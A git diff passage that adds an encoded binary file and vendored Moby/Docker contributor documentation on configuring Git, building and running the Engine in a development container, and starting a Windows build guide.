zf=v-kfm}|wlbDbhu3dV=$B4#=0xvCUAO`Vi(Se%`h>ku%C9%bnSQrXhFw9TY6Bg<^ zBclNyKay2B3r?8b>o+GAi9;^^M7+zxPc8GJX*LYdEj)7MGOYCGR(q&MM`lD424S;S)FU>>XqM1lM2>ROL2LXe8vvj4Exx@oLOXv%tA707C8`<&wPShaQ?%@nli4ENr7TeRjHx09x=aOU; z$QGi?314OpEu0{Df!^9=d; z@p!jX<7J<$YUUlFeb9WIv6PwuLG(?y_&zgTVFX4K2@g$b{I8n5w@b=?5_faqgN^|Q z8acFxi(NL=QM5LKb0d402rEg`jYZxgF}Ezya^d3bGw#^rL7GBAuPpA)5v_q`-aQjR zYtWnK_YzjQPf`lQKn2H*()NNX)2!8Aiky|e0sz7?y6@d#{cxrE4(lM6EgXFpg!8gB zvS$jgFx79-_2LOYW~6`o&25fj7B>>(ibT^DNni&Zx}OM3W3QLwh{oruCbHd##Mlx4 zngm@w{??s>SDkZFz{2iO_Su040Rm~BdW6@;k5clFTdDSQy8{^HSzJ5 zE3Dk$Ar-cSAAXpKWHSTn?7SGz>_piFnSRt*a4u%w;f|zcbwp6jy!3=Ib>A+5T2hOT z%-vt}p^%s4YaoyansI~3#i-*3$E)-r|B2cTiOIl->=1R zuq+N9vmg90=1jxvIM8k8vfvs`9%jQ7$U6q}lVDPC-yR0w;2TfSZ+n5-rg9+by9M); z28qupk_uUZA+>60f_RLN$nsD?m!Wa4x)p~uaMa`F?HvLg@KxNChK(d8a4k+Rs41@V)x(_ytM}9OW^F#gKSceoDUwqoh+0i2}_%T5hI(Ynw2IZF8>yh9{dDy{`W!1BgJZ+#Fb#jby$W7usumNTm8>~ zd9V(3n}rZV84g4|^(ekVZMk1^+v{9hceAB+9vgA~@M0+W#eVf?8^7ipTlDUBr zIj(+~UJFh?&Q?oMD^p|Jo_kZ(zz|Sk5!7Ljp4t+10PFDn)h7c+rJ6ClNF>W@5R#Uy zk%<`!T7!eVeg~}(?j=0Ky@J1SO8xr@%3OzV&hr<_ys*m^^7}w18Fe3h>z>rODgh$b z)3%Pw(yOxrOCKh$I>)}Q1O!d|Nl;35&1Lrc0Ohm~}e4-i;Xe@NLE8XP?w5J9yh{o)A6;R*o4IZEd|TrQCFTaGn9dRSCCBPDB#IDiAwbIAJN+4ld+; zNnY-4UABi*_GxQ!*q!FcjKcUwBfzWD%BuWC2{HFWleO^&ND1+~l*o|94^!dY+XQFq zwyh^PyXzLRd~5HcfzxM}{hvsH*t3if65!UA2Yerofq!QF!_62|G5@>h!QANZk;1MQ zfX&_)Z)cJBxD7(bh0%n)`qHJyaA@Syc$NAj=Cc^hv2g@)hZZ4hyu^iWlY_=W2J^g- zW$>57zFsfEVb=U&gXb^;9-N9|W}l67)y?X>BVVMKR2de5sA5Vv@Y`AheVE(CZ`E&$ zwM9hoM)6mabZ;v#wbndT?R#op@_y9;u;`ta61jXAJk8f-!%7zsTMw5Z`-&LR(ym%p zKW7QyF5!Z9yTB|nAO_HGK5JXtnr=5FChehK^W_)wysFF9FGVtLuXxPC(H^9!Uh$4t z+$5}@Ju0l-GcMU|C~fGfOrIWPLyk;3h<58b`Od}%=xl{q;J(Yy!S1ouPa_Q}&s~TO z3k`fW2jr3FHQs2p=VglyPu6vj;qk=v1wFT!_)+_#_{WReHI6!AYSzF-Xs283q=?UV zT_?^r#Wf|KQ7A#}Ein2$%sT)+3mWeDiB$flLKTflXlW>t4NYSS7NfOuR?P=8Z#Hys zVk^;w4a%SRMMO3y3>$Ih%3WUBQAeN$FTDgg3|1@WC{U>_lpFHej{A77NS`-6 zC@PSrXdc<(TcPiqo$FIpr~hRCJ?^|+%&lX{&Xbt2)Ct8z#A*{v`#p3lj`d@$B8q7N zO0^uEEqYVj!;=?hXxAXu0aNkwa>}teIQ!|51kp@a;WU_o*M8V#Z#I72J}}t|xd38O zM)@6lBPVV#CgJl6**C*G7D&k*mDaC74~=l6~5j79n-N|k>rs>Nw`WWhX%nqdiK;c&BZ=+c1Fdu zR4`W37gR*8hfb#+gl!b7QjNj#P}@}A^ChI0;?+(pCwK~Vg`^^vynxAO1(30?1xlop z9oZ(_0i1JNNXH;;*TsXbH({vfimat-@jFFoPyr@9x9V7+NpYM@6M%wMZ8G4Ii5W7T~iW~F2A8+ zZIq5m+Vs1!R#V1LMU6(1aVk{ZB_myMKOc0BxSwgYT3=NETA@gg1rNrGip@V*ec@Y z8D0P>p`oR~^(}`=&!?1Pbl+nU=uXN(rokv?8ANTIc33mz&u_)*4haVu_C%G*pn?Q( zDvX!FiNNT&7r0$~J)`#tcC>Qm+;&4EUx$jRX7b>A3-*XZIQQDuAmmck$&VN~-XtAy zZ+jecR0eQBeZ}9h8tbC*FJOD2ax%)zT&&P*6fK9fK$9-<3z(r60939dHJ~ty=8bSP(^#y44-|N>2eG9 zrMjPE!ByM5xJTl6PzNUg9lROp;6_g8x7tU@IM*BESi zt?z`*6Qbu38uH5BK&HxCqii5aw$9_z^BRu*Qw%qXn-ec)t6^E=;%hz3{lL5jNEobl zKGNa=#QTzQ2%hD3TmfEEKPV7-(Xp{$O}+~W-M5RGSM-i+{0(?Vg<8xgL3Q1ptQWkN zC78Q!(p;6yZh%Lb2=0;9yZMErUjMPSS;gs84KB= zum)Hsob(*L^G39@pyzP=g16Apn`YW-LKt_`pF0sAmOCc0OL5747cq)qf^jJy(FlS6hvaU6ouj?5dcK3iL$Ve3UB1tx$znH!65O-~&UStxN2{=z68b?-`$(MZl7_o2=;+ebst8~K* zAw&eJTem?p(E`NNO*5sIAO`>3L4+i#2D?K#AJ5(BqbMEt=2NznX6wp7A=#>YD%u$j zMN3gQr`MLdWulucp4@x)N@!4QCRV&?!e~YXPN{lo7eds7@6lcGKbQ^jP!__IU;<=& zk?we5srSXqJ@YpN@wK&|vuTO&niD7hm)8l;N`MGY(T)I8vQusAWZnf@l`3g&7i5bL z0O2+S*?O-CoJ_2#RN(_Y2<6NzIEhs?TO79X`@dtcay4UsK+qtwh zmOnha=w#vRDX+LtpZR@gfLvzf2j*gt+bPs_iE?{x$sH{d4Ty}U@&(gc< zfJ$)5bd=r8V)*OXKiUAYsW*Y2CzVPMK%T=AnW}-yg5&6tq*==)***GC%+&``yb3sj zpjNrDnkVAGHN^lSwAm}(%8x*7kr@ZbDerazO1&aV=?mo*S1_5Q76yG7opkK1%ZG=7 zNg}#bk;OX&usOpqXHoM263r{|GyzVj_6US*-*&V+^U(LO*DE(}U0DV~{%2lG?=MhE zaK6Z|8g#F`+q;S|1RivT;j(opuZ{s>nU!?wekO2z#3zh9x;5@Ce(V6%Iqw--wI}V2 zEUv9o11a@kKsYd+@MQuTT^#IJ;IR*!UI=eA?GF*pW!V90o?;5{ww(Z#`5}K57HbIU z{h*}(17v&o@o=)$C!VQIb@((atx5M3*-wL zEd$)|l$0Qoz(Dw3Xt(aT&&a)N&muwo<(!L#i-t21q_vrG!~g9)_H{W$U@=S#r{6R2 z@NVySXA1&;A#$HYf!=HmN@otRJ*LMb7BQEA)Z}tZZnA{4#KM>$$Yj%R;M(;VI8}R0 z`YV&N+DU|>+oyp=VbnYe>@7yBqIuP&WjAh~EkkG_7qVhzdpx+;(hzy64)EJ4Wl~B9 z2C+@d0pgz3%3a|l2gfZaxbrw~9ocmS5nmfb>vy>*Wo(;mg#y&a^#mzao&-Fb?4 zwsW`?I<0Xyk55(kH||socoP!As-J38s7kG({X3I7J~ zi5OM7I$Y7o-z}kg^0Pn zhz2sE=7Q`Fhwu(8>j%f6c8>k|t%vLca;0-Y$|fjTN|_RQ#}LRRgG@MXM>f%)s{YcF>Jl zeMW;>(rs3p_a~w4ii)2y@DLAutKO)T!T)YB=+(5G@(^MmlDzG3#TCV5xlg;pS@*t_ zHCkd0$Uep}VJk959j*Wm#serCm7fmtxXzd3^p|BlwbeA>nXsN6I+L0*zWgZI@vXu0 zWFJLC;0pPmxTRic)K%~(9BvgCsoefM@A-@keQW4x^F4}ceVXcP6Z7r1c;T)fo(`pP z2G-qp$8oflTxjYIg13jjY*#m+jk&Rfhqq~WyNz_DV0(5nygP98yaQ8n0+%PnxKbG9 zOp?UYkZ=2TNCX}^@ea)jdrIQsQocr_5@G8D0B#Lxu2rvYDeEWInHflu>a+W1d#~yw z1g&Ix!z58Ex{PwCLcvGgw3R9a^dSV=u+Q)8v%ECBDnQ@HA8+CMa?^D1I>C^NAD*OM zc4`7=@ff6**66X6aQ?ySX`{B|l_9lE#XQ`x(*zHE~+4-q~YD%6puMOZoQH=-t0*gs8=Sy z|0}Osz^Rk}r2sGIGURsn;HqWc4VVv^-}9IWEo#N?Tj!3G#W7uTSv#wP*D-mh_K+rr z{h-k`dk)l{X028uHC2Ra@>%kzQssRoRWXw`ItAbIiwZB}wJtq(qk?R6cDXaKa#1OB zHtec2$Ucg$3&%=z+yR1eFa1x(C9-wQ(H?AwN zE8IhptVy!&7sPWHbyOzlHvGt%+wi~h-M7FxA27q`2P$6qg4HG5Aw>kNC*c6=3)C;m z`ddbN+of#M-i-lutZBuf_&qa}L&89$s(8z-*!Aw6c@$A3PS%f&ny6y21<%H{d&aEo ztfP|4(Z}sWVO_HU{(ox;Kax_-JWE~_{9I0Aq5Z;!by+k2eJYrG^|e#=)2JgZy9lmJ z1QdNkg};`wZ?hAFDzg#x{Wp>_Qv8COI5g1D`X-*Zggo~sNdf_qM2eUem8Oc>|>R)l%MPo-=@ z<=1>KMn_G5=(fkk1Zz8*EwvyX9==dX-6QVM`#AQde4ON$);Ovvg3Uu!vB2Dtn#U!%cseRjUy1nHSBP%A#;rRvA+y_XOX--#`ZUQ^ zY@sy{%r`uM(RFf$)P*Jw5;Fhhm1OpJ_89%9NksM)>bmagq_bVTiGmVjD``^_lrvMd zgVzF;_{UYabNg$F{5wBkFvV;A_NozhTcnAc2i;#tg!9Qi$+n-tt1jtNjf!%McbhGm zI+7lH;w--q^wxdm>rRRf9ZaoFaNO)FR@^|G@A7i?@;CWA%igxoFr?q{`2D$Ue*c9* zR&2iU{MC%(uN=VXF_@=N3CD;?4b$B&n8fDGfL`*t>o|rlw6ZPMhfYB*5c#pjke160 z`_d-ipH5UkFyp1&2X)U#PXe9%_1Dsgu>$uU-m~jO9$WA0pRCLQuu&mFO8EowK}?#f zJc`PjSc2ibK;5=jgT@2t@MZlBo_Ato6i#yz#t|?sF2miOHD5B%Zck*z8GRNjS^BBX83QE`$D`< zmW3Uap`rcOC_;9gu<;DhsR!5gYxGb|dk?-7N?Zc=>5JLP{b<+@@#gIGt3=WQBw~WE z@;Q!O=8n}vlVLiY92-^aw!+~Y6|9O7jq+1bA%$%r(kVHxh3=f#_H#JcP1+Nq_v@0E zuCYkBpfilv3?wW;p-#)PVzYG@ySx4L_3;|c@t z7tV|83v+D*8vH$U%`Yhz*&D7V4#MfE-fHI)}@i$xfEO}w@o7hh=>oK?#5j{=Bl${8#tz=ELvt*WU+?EF`yIpcKO$Z{V z$+Vjq4n-#lZ2jk&&N0f}bUmk%mTD?U$eQG^3g60>k-0NBftL?3;K>qCmEV+o{vfR# z=4b`07Z?MbZ-C)*=OT7QNK<)Etg=okF_ynMiN9bQ8H}l9U1OoU`lTX()I4htEc8{! zfW&7UyzvTqBuSTSqDjJ?jJ@|AvY&VZ3D)``bwdR3Kbk*cf-FIc|5FW_cD>oDOg2-;K$^j za^5&KY|LN9G)^R6*2U-4i2njlc<`G~A0%9>?gdHsfQ88qW4o_#3&=~%pQRRr7($Tg zlPp*34>g@=8V9F`P~e>6OE4$nGOE`TK#6u}Jl$ETLjjjG{5pWq3b?m}+iD)nw@j2S z40Nl%4IHeR`D@Xk=v|ErT2L!uDSNVwFp_D-()cwq`HKQ&Y+oMfh_M^Ws;X}U&|;h7Ae}V(#>z3URGwi0h3@OP<_zRagZWD_5p}1ZLS18 zON~92_w{tZrKHEx^15wLWIR6@5`^g|`9x*Dexc6Z{7CxxF{L&k7MAwhvwD%~y6so5 z$Gbcj^HvY^1e32lzi}~dVj%IG<%5sp5mH!K5mIX&UriUzbX2fBH%eooL}Ot=|Ni-^ z%mi)u^_r>j#~**}fIbp@=+Df1Li$ zPyKl{Ah`v8er?Y@xxkZ4_;dR|PV)^q{^Y%X-t3=;tNy=r8mQ?5QU88Z&=Z{h_nZ2^ zd>W$vjjQ?DS^jK#ojK+hCh0TKBcjJR$%bOPBdEadzq?-(=nsD$ezHAK>EGLC7dqR& zUriu6RsP-m$bN1A$7w2|Hl$>O{fq2|I_>*Z=1d@rd&8Vo(283gD)9{1qTS@Uj^T&F+?a;9Oji7ywJ3| zDO_*O8iCiDIfc(0a?t;RMFV<7zsF+UKmIuBPbWK&KL_2ubI@@7--c@FUGSe>>Eu=8 zpA*AtXoUXfCg>gioGVuU$EK5E{MVJ`TR^*Wpds_;YhZyWnNpPSQ_5!D0rX9n%E@t$ z`U-k?{BAwq)YsqE89?6}5pz0u3o=rht0hgTOQo-UgY)DHY3R|4M9JD*zxI1;bE#ys z7bK5g{QE-#UH|yF-yiyOn$jhLuH)CG{m*tfnW9eGj1v9xCjU4T*++FU3;cQa+FT(* zwCD{3t6y)jiqQp^#&PNA#pJK<_nrT!(svWw&Z_oY_o4scYB+QOlxQxDBm=OsQ*H|zKYmgU?NqynQZ7-n Hxck2V))LuH literal 0 HcmV?d00001 diff --git a/vendor/github.com/docker/docker/docs/contributing/set-up-dev-env.md b/vendor/github.com/docker/docker/docs/contributing/set-up-dev-env.md new file mode 100644 index 0000000000..3d56c0b8c7 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/contributing/set-up-dev-env.md @@ -0,0 +1,372 @@ +### Work with a development container + +In this section, you learn to develop like the Moby Engine core team. +The `moby/moby` repository includes a `Dockerfile` at its root. This file defines +Moby's development environment. The `Dockerfile` lists the environment's +dependencies: system libraries and binaries, Go environment, Go dependencies, +etc. + +Moby's development environment is itself, ultimately a Docker container. +You use the `moby/moby` repository and its `Dockerfile` to create a Docker image, +run a Docker container, and develop code in the container. + +If you followed the procedures that [set up Git for contributing](./set-up-git.md), you should have a fork of the `moby/moby` +repository. You also created a branch called `dry-run-test`. In this section, +you continue working with your fork on this branch. + +## Task 1. Remove images and containers + +Moby developers run the latest stable release of the Docker software. They clean their local hosts of +unnecessary Docker artifacts such as stopped containers or unused images. +Cleaning unnecessary artifacts isn't strictly necessary, but it is good +practice, so it is included here. + +To remove unnecessary artifacts: + +1. Verify that you have no unnecessary containers running on your host. + + ```none + $ docker ps -a + ``` + + You should see something similar to the following: + + ```none + CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES + ``` + + There are no running or stopped containers on this host. A fast way to + remove old containers is the following: + + You can now use the `docker system prune` command to achieve this: + + ```none + $ docker system prune -a + ``` + + Older versions of the Docker Engine should reference the command below: + + ```none + $ docker rm $(docker ps -a -q) + ``` + + This command uses `docker ps` to list all containers (`-a` flag) by numeric + IDs (`-q` flag). Then, the `docker rm` command removes the resulting list. + If you have running but unused containers, stop and then remove them with + the `docker stop` and `docker rm` commands. + +2. Verify that your host has no dangling images. + + ```none + $ docker images + ``` + + You should see something similar to the following: + + ```none + REPOSITORY TAG IMAGE ID CREATED SIZE + ``` + + This host has no images. You may have one or more _dangling_ images. A + dangling image is not used by a running container and is not an ancestor of + another image on your system. A fast way to remove dangling image is + the following: + + ```none + $ docker rmi -f $(docker images -q -a -f dangling=true) + ``` + + This command uses `docker images` to list all images (`-a` flag) by numeric + IDs (`-q` flag) and filter them to find dangling images (`-f dangling=true`). + Then, the `docker rmi` command forcibly (`-f` flag) removes + the resulting list. If you get a "docker: "rmi" requires a minimum of 1 argument." + message, that means there were no dangling images. To remove just one image, use the + `docker rmi ID` command. + +## Task 2. Start a development container + +If you followed the last procedure, your host is clean of unnecessary images and +containers. In this section, you build an image from the Engine development +environment and run it in the container. Both steps are automated for you by the +Makefile in the Engine code repository. The first time you build an image, it +can take over 15 minutes to complete. + +1. Open a terminal. + + For [Docker Toolbox](https://github.com/docker/toolbox) users, use `docker-machine status your_vm_name` to make sure your VM is running. You + may need to run `eval "$(docker-machine env your_vm_name)"` to initialize your + shell environment. If you use Docker for Mac or Docker for Windows, you do not need + to use Docker Machine. + +2. Change into the root of the `moby-fork` repository. + + ```none + $ cd ~/repos/moby-fork + ``` + + If you are following along with this guide, you created a `dry-run-test` + branch when you [set up Git for contributing](./set-up-git.md). + +3. Ensure you are on your `dry-run-test` branch. + + ```none + $ git checkout dry-run-test + ``` + + If you get a message that the branch doesn't exist, add the `-b` flag (`git checkout -b dry-run-test`) so the + command both creates the branch and checks it out. + +4. Use `make` to build a development environment image and run it in a container. + + ```none + $ make BIND_DIR=. shell + ``` + + Using the instructions in the + `Dockerfile`, the build may need to download and / or configure source and other images. On first build this process may take between 5 - 15 minutes to create an image. The command returns informational messages as it runs. A + successful build returns a final message and opens a Bash shell into the + container. + + ```none + Successfully built 3d872560918e + Successfully tagged docker-dev:dry-run-test + docker run --rm -i --privileged -e BUILDFLAGS -e KEEPBUNDLE -e DOCKER_BUILD_GOGC -e DOCKER_BUILD_PKGS -e DOCKER_CLIENTONLY -e DOCKER_DEBUG -e DOCKER_EXPERIMENTAL -e DOCKER_GITCOMMIT -e DOCKER_GRAPHDRIVER=devicemapper -e DOCKER_INCREMENTAL_BINARY -e DOCKER_REMAP_ROOT -e DOCKER_STORAGE_OPTS -e DOCKER_USERLANDPROXY -e TESTDIRS -e TESTFLAGS -e TIMEOUT -v "home/ubuntu/repos/docker/bundles:/go/src/github.com/docker/docker/bundles" -t "docker-dev:dry-run-test" bash + # + ``` + + At this point, your prompt reflects the container's BASH shell. + +5. List the contents of the current directory (`/go/src/github.com/docker/docker`). + + You should see the image's source from the `/go/src/github.com/docker/docker` + directory. + + ![List example](images/list_example.png) + +6. Make a `dockerd` binary. + + ```none + # hack/make.sh binary + Removing bundles/ + + ---> Making bundle: binary (in bundles/binary) + Building: bundles/binary-daemon/dockerd-17.06.0-dev + Created binary: bundles/binary-daemon/dockerd-17.06.0-dev + Copying nested executables into bundles/binary-daemon + + ``` + +7. Run `make install`, which copies the binary to the container's + `/usr/local/bin/` directory. + + ```none + # make install + ``` + +8. Start the Engine daemon running in the background. + + ```none + # dockerd -D & + ...output snipped... + DEBU[0001] Registering POST, /networks/{id:.*}/connect + DEBU[0001] Registering POST, /networks/{id:.*}/disconnect + DEBU[0001] Registering DELETE, /networks/{id:.*} + INFO[0001] API listen on /var/run/docker.sock + DEBU[0003] containerd connection state change: READY + ``` + + The `-D` flag starts the daemon in debug mode. The `&` starts it as a + background process. You'll find these options useful when debugging code + development. You will need to hit `return` in order to get back to your shell prompt. + + > **Note**: The following command automates the `build`, + > `install`, and `run` steps above. Once the command below completes, hit `ctrl-z` to suspend the process, then run `bg 1` and hit `enter` to resume the daemon process in the background and get back to your shell prompt. + + ```none + hack/make.sh binary install-binary run + ``` + +9. Inside your container, check your Docker versions: + + ```none + # docker version + Client: + Version: 17.06.0-ce + API version: 1.30 + Go version: go1.8.3 + Git commit: 02c1d87 + Built: Fri Jun 23 21:15:15 2017 + OS/Arch: linux/amd64 + + Server: + Version: dev + API version: 1.35 (minimum version 1.12) + Go version: go1.9.2 + Git commit: 4aa6362da + Built: Sat Dec 2 05:22:42 2017 + OS/Arch: linux/amd64 + Experimental: false + ``` + + Notice the split versions between client and server, which might be + unexpected. In more recent times the Docker CLI component (which provides the + `docker` command) has split out from the Moby project and is now maintained in: + + * [docker/cli](https://github.com/docker/cli) - The Docker CLI source-code; + * [docker/docker-ce](https://github.com/docker/docker-ce) - The Docker CE + edition project, which assembles engine, CLI and other components. + + The Moby project now defaults to a [fixed + version](https://github.com/docker/docker-ce/commits/v17.06.0-ce) of the + `docker` CLI for integration tests. + + You may have noticed the following message when starting the container with the `shell` command: + + ```none + Makefile:123: The docker client CLI has moved to github.com/docker/cli. For a dev-test cycle involving the CLI, run: + DOCKER_CLI_PATH=/host/path/to/cli/binary make shell + then change the cli and compile into a binary at the same location. + ``` + + By setting `DOCKER_CLI_PATH` you can supply a newer `docker` CLI to the + server development container for testing and for `integration-cli` + test-execution: + + ```none + make DOCKER_CLI_PATH=/home/ubuntu/git/docker-ce/components/packaging/static/build/linux/docker/docker BIND_DIR=. shell + ... + # which docker + /usr/local/cli/docker + # docker --version + Docker version 17.09.0-dev, build + ``` + + This Docker CLI should be built from the [docker-ce + project](https://github.com/docker/docker-ce) and needs to be a Linux + binary. + + Inside the container you are running a development version. This is the version + on the current branch. It reflects the value of the `VERSION` file at the + root of your `docker-fork` repository. + +10. Run the `hello-world` image. + + ```none + # docker run hello-world + ``` + +11. List the image you just downloaded. + + ```none + # docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + hello-world latest c54a2cc56cbb 3 months ago 1.85 kB + ``` + +12. Open another terminal on your local host. + +13. List the container running your development container. + + ```none + ubuntu@ubuntu1404:~$ docker ps + CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES + a8b2885ab900 docker-dev:dry-run-test "hack/dind bash" 43 minutes ago Up 43 minutes hungry_payne + ``` + + Notice that the tag on the container is marked with the `dry-run-test` branch name. + + +## Task 3. Make a code change + +At this point, you have experienced the "Moby inception" technique. That is, +you have: + +* forked and cloned the Moby Engine code repository +* created a feature branch for development +* created and started an Engine development container from your branch +* built a binary inside of your development container +* launched a `docker` daemon using your newly compiled binary +* called the `docker` client to run a `hello-world` container inside + your development container + +Running the `make BIND_DIR=. shell` command mounted your local Docker repository source into +your Docker container. + + > **Note**: Inspecting the `Dockerfile` shows a `COPY . /go/src/github.com/docker/docker` instruction, suggesting that dynamic code changes will _not_ be reflected in the container. However inspecting the `Makefile` shows that the current working directory _will_ be mounted via a `-v` volume mount. + +When you start to develop code though, you'll +want to iterate code changes and builds inside the container. If you have +followed this guide exactly, you have a bash shell running a development +container. + +Try a simple code change and see it reflected in your container. For this +example, you'll edit the help for the `attach` subcommand. + +1. If you don't have one, open a terminal in your local host. + +2. Make sure you are in your `moby-fork` repository. + + ```none + $ pwd + /Users/mary/go/src/github.com/moxiegirl/moby-fork + ``` + + Your location should be different because, at least, your username is + different. + +3. Open the `cmd/dockerd/docker.go` file. + +4. Edit the command's help message. + + For example, you can edit this line: + + ```go + Short: "A self-sufficient runtime for containers.", + ``` + + And change it to this: + + ```go + Short: "A self-sufficient and really fun runtime for containers.", + ``` + +5. Save and close the `cmd/dockerd/docker.go` file. + +6. Go to your running docker development container shell. + +7. Rebuild the binary by using the command `hack/make.sh binary` in the docker development container shell. + +8. Stop Docker if it is running. + +9. Copy the binaries to **/usr/bin** by entering the following commands in the docker development container shell. + + ``` + hack/make.sh binary install-binary + ``` + +10. To view your change, run the `dockerd --help` command in the docker development container shell. + + ```bash + # dockerd --help + + Usage: dockerd COMMAND + + A self-sufficient and really fun runtime for containers. + + Options: + ... + + ``` + +You've just done the basic workflow for changing the Engine code base. You made +your code changes in your feature branch. Then, you updated the binary in your +development container and tried your change out. If you were making a bigger +change, you might repeat or iterate through this flow several times. + +## Where to go next + +Congratulations, you have successfully achieved Docker inception. You've had a +small experience of the development process. You've set up your development +environment and verified almost all the essential processes you need to +contribute. Of course, before you start contributing, [you'll need to learn one +more piece of the development process, the test framework](test.md). diff --git a/vendor/github.com/docker/docker/docs/contributing/set-up-git.md b/vendor/github.com/docker/docker/docs/contributing/set-up-git.md new file mode 100644 index 0000000000..f320c2716c --- /dev/null +++ b/vendor/github.com/docker/docker/docs/contributing/set-up-git.md @@ -0,0 +1,280 @@ +### Configure Git for contributing + +Work through this page to configure Git and a repository you'll use throughout +the Contributor Guide. The work you do further in the guide, depends on the work +you do here. + +## Task 1. Fork and clone the Moby code + +Before contributing, you first fork the Moby code repository. A fork copies +a repository at a particular point in time. GitHub tracks for you where a fork +originates. + +As you make contributions, you change your fork's code. When you are ready, +you make a pull request back to the original Docker repository. If you aren't +familiar with this workflow, don't worry, this guide walks you through all the +steps. + +To fork and clone Moby: + +1. Open a browser and log into GitHub with your account. + +2. Go to the moby/moby repository. + +3. Click the "Fork" button in the upper right corner of the GitHub interface. + + ![Branch Signature](images/fork_docker.png) + + GitHub forks the repository to your GitHub account. The original + `moby/moby` repository becomes a new fork `YOUR_ACCOUNT/moby` under + your account. + +4. Copy your fork's clone URL from GitHub. + + GitHub allows you to use HTTPS or SSH protocols for clones. You can use the + `git` command line or clients like Subversion to clone a repository. + + ![Copy clone URL](images/copy_url.png) + + This guide assume you are using the HTTPS protocol and the `git` command + line. If you are comfortable with SSH and some other tool, feel free to use + that instead. You'll need to convert what you see in the guide to what is + appropriate to your tool. + +5. Open a terminal window on your local host and change to your home directory. + + ```bash + $ cd ~ + ``` + + In Windows, you'll work in your Docker Quickstart Terminal window instead of + Powershell or a `cmd` window. + +6. Create a `repos` directory. + + ```bash + $ mkdir repos + ``` + +7. Change into your `repos` directory. + + ```bash + $ cd repos + ``` + +8. Clone the fork to your local host into a repository called `moby-fork`. + + ```bash + $ git clone https://github.com/moxiegirl/moby.git moby-fork + ``` + + Naming your local repo `moby-fork` should help make these instructions + easier to follow; experienced coders don't typically change the name. + +9. Change directory into your new `moby-fork` directory. + + ```bash + $ cd moby-fork + ``` + + Take a moment to familiarize yourself with the repository's contents. List + the contents. + +## Task 2. Set your signature and an upstream remote + +When you contribute to Docker, you must certify you agree with the +Developer Certificate of Origin. +You indicate your agreement by signing your `git` commits like this: + +``` +Signed-off-by: Pat Smith +``` + +To create a signature, you configure your username and email address in Git. +You can set these globally or locally on just your `moby-fork` repository. +You must sign with your real name. You can sign your git commit automatically +with `git commit -s`. Moby does not accept anonymous contributions or contributions +through pseudonyms. + +As you change code in your fork, you'll want to keep it in sync with the changes +others make in the `moby/moby` repository. To make syncing easier, you'll +also add a _remote_ called `upstream` that points to `moby/moby`. A remote +is just another project version hosted on the internet or network. + +To configure your username, email, and add a remote: + +1. Change to the root of your `moby-fork` repository. + + ```bash + $ cd moby-fork + ``` + +2. Set your `user.name` for the repository. + + ```bash + $ git config --local user.name "FirstName LastName" + ``` + +3. Set your `user.email` for the repository. + + ```bash + $ git config --local user.email "emailname@mycompany.com" + ``` + +4. Set your local repo to track changes upstream, on the `moby/moby` repository. + + ```bash + $ git remote add upstream https://github.com/moby/moby.git + ``` + +5. Check the result in your `git` configuration. + + ```bash + $ git config --local -l + core.repositoryformatversion=0 + core.filemode=true + core.bare=false + core.logallrefupdates=true + remote.origin.url=https://github.com/moxiegirl/moby.git + remote.origin.fetch=+refs/heads/*:refs/remotes/origin/* + branch.master.remote=origin + branch.master.merge=refs/heads/master + user.name=Mary Anthony + user.email=mary@docker.com + remote.upstream.url=https://github.com/moby/moby.git + remote.upstream.fetch=+refs/heads/*:refs/remotes/upstream/* + ``` + + To list just the remotes use: + + ```bash + $ git remote -v + origin https://github.com/moxiegirl/moby.git (fetch) + origin https://github.com/moxiegirl/moby.git (push) + upstream https://github.com/moby/moby.git (fetch) + upstream https://github.com/moby/moby.git (push) + ``` + +## Task 3. Create and push a branch + +As you change code in your fork, make your changes on a repository branch. +The branch name should reflect what you are working on. In this section, you +create a branch, make a change, and push it up to your fork. + +This branch is just for testing your config for this guide. The changes are part +of a dry run, so the branch name will be dry-run-test. To create and push +the branch to your fork on GitHub: + +1. Open a terminal and go to the root of your `moby-fork`. + + ```bash + $ cd moby-fork + ``` + +2. Create a `dry-run-test` branch. + + ```bash + $ git checkout -b dry-run-test + ``` + + This command creates the branch and switches the repository to it. + +3. Verify you are in your new branch. + + ```bash + $ git branch + * dry-run-test + master + ``` + + The current branch has an * (asterisk) marker. So, these results show you + are on the right branch. + +4. Create a `TEST.md` file in the repository's root. + + ```bash + $ touch TEST.md + ``` + +5. Edit the file and add your email and location. + + ![Add your information](images/contributor-edit.png) + + You can use any text editor you are comfortable with. + +6. Save and close the file. + +7. Check the status of your branch. + + ```bash + $ git status + On branch dry-run-test + Untracked files: + (use "git add ..." to include in what will be committed) + + TEST.md + + nothing added to commit but untracked files present (use "git add" to track) + ``` + + You've only changed the one file. It is untracked so far by git. + +8. Add your file. + + ```bash + $ git add TEST.md + ``` + + That is the only _staged_ file. Stage is fancy word for work that Git is + tracking. + +9. Sign and commit your change. + + ```bash + $ git commit -s -m "Making a dry run test." + [dry-run-test 6e728fb] Making a dry run test + 1 file changed, 1 insertion(+) + create mode 100644 TEST.md + ``` + + Commit messages should have a short summary sentence of no more than 50 + characters. Optionally, you can also include a more detailed explanation + after the summary. Separate the summary from any explanation with an empty + line. + +10. Push your changes to GitHub. + + ```bash + $ git push --set-upstream origin dry-run-test + Username for 'https://github.com': moxiegirl + Password for 'https://moxiegirl@github.com': + ``` + + Git prompts you for your GitHub username and password. Then, the command + returns a result. + + ```bash + Counting objects: 13, done. + Compressing objects: 100% (2/2), done. + Writing objects: 100% (3/3), 320 bytes | 0 bytes/s, done. + Total 3 (delta 1), reused 0 (delta 0) + To https://github.com/moxiegirl/moby.git + * [new branch] dry-run-test -> dry-run-test + Branch dry-run-test set up to track remote branch dry-run-test from origin. + ``` + +11. Open your browser to GitHub. + +12. Navigate to your Moby fork. + +13. Make sure the `dry-run-test` branch exists, that it has your commit, and the +commit is signed. + + ![Branch Signature](images/branch-sig.png) + +## Where to go next + +Congratulations, you have finished configuring both your local host environment +and Git for contributing. In the next section you'll [learn how to set up and +work in a Moby development container](set-up-dev-env.md). diff --git a/vendor/github.com/docker/docker/docs/contributing/software-req-win.md b/vendor/github.com/docker/docker/docs/contributing/software-req-win.md new file mode 100644 index 0000000000..3070d34e83 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/contributing/software-req-win.md @@ -0,0 +1,177 @@ +### Build and test Moby on Windows + +This page explains how to get the software you need to build, test, and run the +Moby source code for Windows and setup the required software and services: + +- Windows containers +- GitHub account +- Git + +## Prerequisites 